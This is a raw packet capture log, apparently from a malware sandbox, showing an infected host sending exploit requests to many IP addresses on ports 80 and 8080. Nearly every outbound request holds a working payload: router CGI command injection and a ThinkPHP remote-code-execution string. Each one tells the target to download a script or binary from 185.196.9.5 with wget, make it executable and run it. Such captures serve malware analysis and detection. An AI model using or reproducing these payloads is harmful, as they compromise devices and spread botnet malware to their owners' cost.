Feb 25, 2024 19:03:01.500411987 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:01 GMT Date: Sun, 25 Feb 2024 18:03:01 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 34 31 34 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 31 26 23 34 36 3b 34 37 64 38 62 61 61 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4414655f.1708884181.47d8baa7</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
219	192.168.2.15	33948	95.210.34.5	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.791997910 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
220	192.168.2.15	54574	62.171.150.120	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.794049978 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:01.984054089 CET	291	IN	HTTP/1.1 404 Not Found Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io; Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 25 Feb 2024 18:03:01 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
221	192.168.2.15	54820	62.3.164.240	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.805643082 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
222	192.168.2.15	53964	94.122.213.126	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.827622890 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
223	192.168.2.15	50586	85.214.87.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.957042933 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:02.170758963 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:02 GMT Server: Apache X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Robots-Tag: none X-Frame-Options: SAMEORIGIN X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Set-Cookie: ock16uvyqnnf=mtdeqs25499kifcpce9noejf25; path=/; HttpOnly; SameSite=Strict Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=WlJisGM84Xic84h3RztudyX5gIgRSXrrmrJEDI21W%2BUqnNT%2B6OhhnYnYKmZyeT71IpjO05YsmSfVIkt4krJB8cZoRdLSsVqVbCFK1Y7BdADHnxmv1J9qEF3GslEl6gOq; expires=Sun, 25-Feb-2024 18:23:02 GMT; Max-Age=1200; path=/; HttpOnly; SameSite=Strict Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; frame-src ; img-src data: blob:; font-src 'self' data:; media-src ; connect-src Status: 400 Bad Request Content-Length: 6767 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 67 2d 63 73 70 22 20 64 61 74 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2d 66 6f 63 75 73 3d 22 66 61 6c 73 65 22 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 09 3c 68 65 61 64 20 64 61 74 61 2d 72 65 71 75 65 73 74 74 6f 6b 65 6e 3d 22 50 52 49 73 59 69 34 68 45 51 35 44 51 78 78 64 55 7a 5a 7a 61 53 4a 75 55 6a 55 61 41 67 41 47 43 51 68 6a 47 53 6f 62 63 6c 73 3d 3a 77 75 64 35 46 50 57 56 32 34 6f 6e 38 74 30 2f 6b 58 64 53 4a 35 6b 42 4b 6d 48 4a 49 48 4b 69 75 55 58 41 6e 67 4a 7a 59 55 77 3d 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 6f 77 6e 43 6c 6f 75 64 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 Data Ascii: <!DOCTYPE html><html class="ng-csp" data-placeholder-focus="false" lang="en" ><head data-requesttoken="PRIsYi4hEQ5DQxxdUzZzaSJuUjUaAgAGCQhjGSobcls=:wud5FPWV24on8t0/kXdSJ5kBKmHJIHKiuUXAngJzYUw="><meta charset="utf-8"><title>ownCloud</title><meta h

Session ID	Source IP	Source Port	Destination IP	Destination Port
224	192.168.2.15	59168	31.30.82.27	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:01.963099957 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:02.164911985 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:03:02 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
225	192.168.2.15	48616	94.123.25.246	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:02.235527992 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
226	192.168.2.15	48970	95.86.89.219	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:02.240672112 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
227	192.168.2.15	44660	112.175.173.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:02.726982117 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:03.016649008 CET	541	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 25 Feb 2024 18:03:02 GMT Server: Apache/2.2.15 (CentOS) Location: http://enter.etoday.co.kr/index?s=/index/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 253 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 6d 50 c1 4e c3 30 0c bd f7 2b 4c 4f 70 20 6e 8b 90 10 ca 32 41 5b c4 a4 8d 55 5a 38 70 cc 1a a3 4c b4 4d 95 86 89 fe 3d 69 cb 6d 5c 2c db ef f9 3d db fc aa d8 e7 f2 a3 2a e1 55 ee b6 50 bd 3f 6f 37 39 c4 b7 88 9b 52 be 20 16 b2 58 90 8c 25 88 e5 5b 2c 22 6e 7c db 08 6e 48 e9 50 f8 93 6f 48 dc 25 29 ec ec 99 34 54 e4 5a d5 51 e7 9b 91 e3 02 46 1c 67 32 3f 5a 3d 4e f3 a9 f8 87 1b ba 11 ef 85 34 04 da d6 df 6d 68 83 51 03 b4 33 95 2b 30 8e 3e 57 b1 f1 be 7f 44 0c 28 39 46 de 6a 35 b2 da b2 2f 87 a7 4e d3 cf 7a 58 2d 09 c6 c2 90 23 8e 4a 30 8e fd 64 eb 42 50 5a 3b 1a 06 f1 d4 ab da 10 66 2c 63 e9 3d 5c e7 41 6f 7f b8 81 03 b9 33 39 50 1e 2e 0d a0 b2 ce c3 43 12 24 ff 44 c2 61 f3 49 61 f9 e9 25 d1 2f b6 cb 6b 80 4d 01 00 00 Data Ascii: mPN0+LOp n2A[UZ8pLM=im\,=*UP?o79R X%[,"n\|nHPoH%)4TZQFg2?Z=N4mhQ3+0>WD(9Fj5/NzX-#J0dBPZ;f,c=\Ao39P.C$DaIa%/kM

Session ID	Source IP	Source Port	Destination IP	Destination Port
228	192.168.2.15	50362	112.162.237.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:03.012382984 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:03.299117088 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:03 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
229	192.168.2.15	50534	112.165.99.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:03.014560938 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
230	192.168.2.15	38074	112.95.73.153	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:03.351788998 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:03.689505100 CET	295	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:03 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
231	192.168.2.15	43900	94.72.162.38	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.616084099 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:04.744250059 CET	88	IN	HTTP/1.0 400 Bad Request Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a Data Ascii: Client sent an HTTP request to an HTTPS server.

Session ID	Source IP	Source Port	Destination IP	Destination Port
232	192.168.2.15	36318	94.228.153.1	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.691050053 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
233	192.168.2.15	42724	94.123.58.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.711766958 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
234	192.168.2.15	46012	94.122.123.113	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.713273048 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
235	192.168.2.15	43264	95.101.237.182	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.869690895 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:05.038160086 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:04 GMT Date: Sun, 25 Feb 2024 18:03:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 65 64 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 34 26 23 34 36 3b 32 35 38 30 31 34 65 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b6ed655f.1708884184.258014e5</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
236	192.168.2.15	54938	31.136.165.195	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.871352911 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:05.446202040 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
